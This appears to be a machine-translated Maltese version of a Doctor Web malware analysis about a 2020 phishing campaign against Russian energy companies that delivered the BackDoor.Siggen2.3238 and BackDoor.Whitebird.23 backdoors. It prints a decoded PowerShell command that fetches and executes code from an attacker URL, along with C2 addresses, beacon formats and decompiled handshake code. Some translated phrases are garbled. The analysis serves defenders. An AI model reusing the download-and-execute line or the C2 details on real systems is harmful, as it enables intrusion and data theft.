L-esperjenza tagħna fl-investigazzjoni ta’ inċidenti tas-sigurtà tal-kompjuter turi li l-email għadha waħda mill-aktar mezzi komuni użati mill-attakkanti biex inizjalment jippenetraw l-infrastrutturi tan-netwerk attakkati. Azzjoni waħda traskurata b'ittra suspettuża (jew mhux daqshekk suspettuża) issir punt ta' dħul għal aktar infezzjoni, u huwa għalhekk li ċ-ċiberkriminali qed jużaw b'mod attiv metodi ta' inġinerija soċjali, għalkemm bi gradi differenti ta' suċċess.
F'din il-post irridu nitkellmu dwar l-investigazzjoni riċenti tagħna f'kampanja ta' spam immirata lejn numru ta' intrapriżi fil-kumpless Russu tal-fjuwil u l-enerġija. L-attakki kollha segwew l-istess xenarju bl-użu ta 'emails foloz, u ħadd ma deher li għamel ħafna sforz fil-kontenut tat-test ta' dawn l-emails.
Servizz ta 'intelliġenza
Kollox beda fl-aħħar ta 'April 2020, meta l-analisti tal-virus Doctor Web sabu kampanja ta' spam li fiha l-hackers bagħtu direttorju tat-telefon aġġornat lill-impjegati ta 'numru ta' intrapriżi fil-kumpless Russu tal-fjuwil u l-enerġija. Naturalment, dan ma kienx sempliċi turija ta' tħassib, peress li d-direttorju ma kienx reali, u d-dokumenti .docx niżżlu żewġ stampi minn riżorsi remoti.
Waħda minnhom ġiet imniżżla fuq il-kompjuter tal-utent mis-server tal-aħbarijiet[.]zannews[.]com. Ta' min jinnota li l-isem tad-dominju huwa simili għad-dominju taċ-ċentru tal-midja kontra l-korruzzjoni tal-Każakstan - zannews[.]kz. Min-naħa l-oħra, id-dominju użat kien immedjatament reminixxenti f'kampanja oħra tal-2015 magħrufa bħala TOPNEWS, li użat backdoor ICEFOG u kellha oqsma ta 'kontroll Trojan bis-substring "aħbarijiet" fl-ismijiet tagħhom. Karatteristika oħra interessanti kienet li meta jintbagħtu emails lil riċevituri differenti, it-talbiet biex tniżżel immaġini użaw jew parametri ta 'rikjesta differenti jew ismijiet ta' immaġini uniċi.
Aħna nemmnu li dan sar bil-għan li tinġabar informazzjoni biex jiġi identifikat destinatarju "affidabbli", li mbagħad ikun garantit li jiftaħ l-ittra fil-ħin it-tajjeb. Il-protokoll SMB intuża biex tniżżel l-immaġni mit-tieni server, li jista 'jsir biex jiġbor il-hashes NetNTLM mill-kompjuters tal-impjegati li fetħu d-dokument riċevut.
U hawn l-ittra nnifisha bid-direttorju falz:
F'Ġunju ta' din is-sena, il-hackers bdew jużaw isem ta' dominju ġdid, sports[.]manhajnews[.]com, biex itellgħu immaġini. L-analiżi wriet li s-sottodominji ta’ manhajnews[.]com ilhom jintużaw fil-bdil ta’ spam mill-inqas minn Settembru 2019. Waħda mill-miri ta’ din il-kampanja kienet università kbira Russa.
Ukoll, sa Ġunju, l-organizzaturi tal-attakk ħarġu b'test ġdid għall-ittri tagħhom: din id-darba d-dokument kien fih informazzjoni dwar l-iżvilupp tal-industrija. It-test tal-ittra indika b'mod ċar li l-awtur tagħha jew ma kienx kelliem nattiv tar-Russu, jew deliberatament kien qed joħloq tali impressjoni dwaru nnifsu. Sfortunatament, l-ideat tal-iżvilupp tal-industrija, bħal dejjem, irriżultaw li kienu biss kopertura - id-dokument reġa' niżżel żewġ stampi, filwaqt li s-server inbidel biex tniżżel[.]inklingpaper[.]com.
L-innovazzjoni li jmiss segwita f'Lulju. F'tentattiv biex jaqbżu l-iskoperta ta 'dokumenti malizzjużi minn programmi antivirus, l-attakkanti bdew jużaw dokumenti ta' Microsoft Word kriptati b'password. Fl-istess ħin, l-attakkanti ddeċidew li jużaw teknika klassika ta 'inġinerija soċjali - notifika ta' premju.
It-test tal-appell reġa’ ġie miktub bl-istess stil, li qajjem suspett addizzjonali fost id-destinatarju. Is-server għat-tniżżil tal-immaġni wkoll ma nbidilx.
Innota li fil-każijiet kollha, kaxxi tal-posta elettroniċi rreġistrati fuq id-dominji tal-posta[.]ru u yandex[.]ru intużaw biex jintbagħtu l-ittri.
Attakk
Sal-bidu ta’ Settembru 2020, kien wasal iż-żmien għall-azzjoni. L-analisti tal-virus tagħna rreġistraw mewġa ġdida ta 'attakki, li fihom l-attakkanti reġgħu bagħtu ittri bl-iskuża li jaġġornaw direttorju tat-telefon. Madankollu, din id-darba l-anness kien fih makro malizzjuż.
Meta fetaħ id-dokument mehmuż, il-makro ħoloq żewġ fajls:
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, li kien maħsub biex iniedi fajl tal-lott;
- Il-fajl tal-lott innifsu %APPDATA%configstest.bat, li kien offuskat.
L-essenza tal-ħidma tagħha tiġi biex tniedi l-qoxra Powershell b'ċerti parametri. Il-parametri mgħoddija lill-qoxra huma dekodifikati fi kmandi:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Kif ġej mill-kmandi ppreżentati, id-dominju li minnu titniżżel it-tagħbija hija għal darb'oħra moħbija bħala sit tal-aħbarijiet. A sempliċi , li l-uniku kompitu tiegħu huwa li jirċievi shellcode mis-server ta 'kmand u kontroll u tesegwixxih. Konna kapaċi nidentifikaw żewġ tipi ta 'backdoors li jistgħu jiġu installati fuq il-PC tal-vittma.
BackDoor.Siggen2.3238
L-ewwel waħda hija BackDoor.Siggen2.3238 — l-ispeċjalisti tagħna ma kinux iltaqgħu magħhom qabel, u lanqas ma kien hemm l-ebda aċċenn għal dan il-programm minn bejjiegħa oħra tal-antivirus.
Dan il-programm huwa backdoor miktub f'C++ u jaħdem fuq sistemi operattivi Windows 32-bit.
BackDoor.Siggen2.3238 huwa kapaċi jikkomunika mas-server tal-ġestjoni billi juża żewġ protokolli: HTTP u HTTPS. Il-kampjun ittestjat juża l-protokoll HTTPS. L-Utent-Agent li ġej jintuża fit-talbiet lis-server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
F'dan il-każ, it-talbiet kollha huma fornuti bis-sett ta' parametri li ġejjin:
%s;type=%s;length=%s;realdata=%send
fejn kull linja %s hija sostitwita b'mod korrispondenti bi:
- ID tal-kompjuter infettat,
- it-tip ta' talba li qed tintbagħat,
- it-tul tad-data fil-qasam tad-data reali,
- dejta.
Fl-istadju tal-ġbir ta 'informazzjoni dwar is-sistema infettata, il-backdoor jiġġenera linja bħal:
lan=%s;cmpname=%s;username=%s;version=%s;
fejn lan huwa l-indirizz IP tal-kompjuter infettat, cmpname huwa l-isem tal-kompjuter, username huwa l-isem tal-utent, il-verżjoni hija l-linja 0.0.4.03.
Din l-informazzjoni bl-identifikatur sysinfo tintbagħat permezz ta’ talba POST lis-server tal-kontroll li jinsab fuq https[:]//31.214[.]157.14/log.txt. Jekk bi tweġiba BackDoor.Siggen2.3238 jirċievi s-sinjal tal-QALB, il-konnessjoni titqies ta 'suċċess, u l-backdoor jibda ċ-ċiklu ewlieni ta' komunikazzjoni mas-server.
Deskrizzjoni aktar kompleta tal-prinċipji operattivi BackDoor.Siggen2.3238 huwa tagħna .
BackDoor.Whitebird.23
It-tieni programm huwa modifika tal-backdoor BackDoor.Whitebird, diġà magħrufa lilna mill-inċident ma 'aġenzija tal-gvern fil-Każakstan. Din il-verżjoni hija miktuba f'C++ u hija mfassla biex taħdem kemm fuq sistemi operattivi Windows 32-bit kif ukoll 64-bit.
Bħal ħafna mill-programmi ta’ dan it-tip, BackDoor.Whitebird.23 iddisinjat biex jistabbilixxi konnessjoni kriptata mas-server ta 'kontroll u kontroll mhux awtorizzat ta' kompjuter infettat. Installat f'sistema kompromessa bl-użu ta' dropper .
Il-kampjun li eżaminajna kien librerija malizzjuża b'żewġ esportazzjonijiet:
- Google Play
- Test.
Fil-bidu tax-xogħol tiegħu, jiddeċifra l-konfigurazzjoni hardwired fil-korp tal-backdoor bl-użu ta 'algoritmu bbażat fuq l-operazzjoni XOR b'byte 0x99. Il-konfigurazzjoni tidher bħal:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Biex jiġi żgurat it-tħaddim kostanti tiegħu, il-backdoor jibdel il-valur speċifikat fil-qasam sigħat_ħidma konfigurazzjonijiet. Il-qasam fih 1440 bytes, li jieħdu l-valuri 0 jew 1 u jirrappreżentaw kull minuta ta 'kull siegħa fil-ġurnata. Joħloq ħajt separat għal kull interface tan-netwerk li jisma 'l-interface u jfittex pakketti ta' awtorizzazzjoni fuq is-server prokura mill-kompjuter infettat. Meta jinstab pakkett bħal dan, il-backdoor iżid informazzjoni dwar is-server proxy mal-lista tiegħu. Barra minn hekk, jiċċekkja l-preżenza ta 'prokura permezz ta' WinAPI InternetQueryOptionW.
Il-programm jiċċekkja l-minuta u s-siegħa kurrenti u jqabbelha mad-dejta fil-qasam sigħat_ħidma konfigurazzjonijiet. Jekk il-valur għall-minuta korrispondenti tal-ġurnata mhuwiex żero, allura tiġi stabbilita konnessjoni mas-server tal-kontroll.
L-istabbiliment ta 'konnessjoni mas-server jissimula l-ħolqien ta' konnessjoni bl-użu tal-protokoll TLS verżjoni 1.0 bejn il-klijent u s-server. Il-korp tal-backdoor fih żewġ buffers.
L-ewwel buffer fih il-pakkett TLS 1.0 Klijent Hello.
It-tieni buffer fih pakketti TLS 1.0 Client Key Exchange b'tul taċ-ċavetta ta '0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.
Meta tibgħat pakkett Klijent Hello, il-backdoor jikteb 4 bytes tal-ħin attwali u 28 bytes ta 'dejta psewdo-każwali fil-qasam Klijent Random, ikkalkulat kif ġej:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Il-pakkett riċevut jintbagħat lis-server tal-kontroll. Ir-rispons (Packet Hello Server) jiċċekkja:
- konformità mal-verżjoni tal-protokoll TLS 1.0;
- korrispondenza tat-timestamp (l-ewwel 4 bytes tal-qasam Random Data packet) speċifikat mill-klijent mat-timestamp speċifikat mis-server;
- taqbila tal-ewwel 4 bytes wara l-timestamp fil-qasam Random Data tal-klijent u s-server.
Fil-każ tal-logħbiet speċifikati, il-backdoor jipprepara pakkett tal-Klijent Key Exchange. Biex tagħmel dan, timmodifika ċ-Ċavetta Pubblika fil-pakkett tal-Iskambju taċ-Ċavetta tal-Klijent, kif ukoll l-Encryption IV u Encryption Data fil-pakkett Encrypted Handshake Message.
Il-backdoor imbagħad jirċievi l-pakkett mis-server tal-kmand u l-kontroll, jiċċekkja li l-verżjoni tal-protokoll TLS hija 1.0, u mbagħad jaċċetta 54 bytes oħra (il-korp tal-pakkett). Dan itemm is-setup tal-konnessjoni.
Deskrizzjoni aktar kompleta tal-prinċipji operattivi BackDoor.Whitebird.23 huwa tagħna .
Konklużjoni u konklużjonijiet
Analiżi ta 'dokumenti, malware, u l-infrastruttura użata tippermettilna ngħidu b'kunfidenza li l-attakk kien ippreparat minn wieħed mill-gruppi Ċiniżi APT. Meta wieħed iqis il-funzjonalità ta 'backdoors li huma installati fuq il-kompjuters tal-vittmi f'każ ta' attakk b'suċċess, l-infezzjoni twassal, għall-inqas, għas-serq ta 'informazzjoni kunfidenzjali mill-kompjuters ta' organizzazzjonijiet attakkati.
Barra minn hekk, xenarju probabbli ħafna huwa l-installazzjoni ta 'trojans speċjalizzati fuq servers lokali b'funzjoni speċjali. Dawn jistgħu jkunu kontrolluri tad-dominju, servers tal-posta, gateways tal-Internet, eċċ. Kif nistgħu naraw fl-eżempju , servers bħal dawn huma ta' interess partikolari għall-attakkanti għal diversi raġunijiet.
Sors: www.habr.com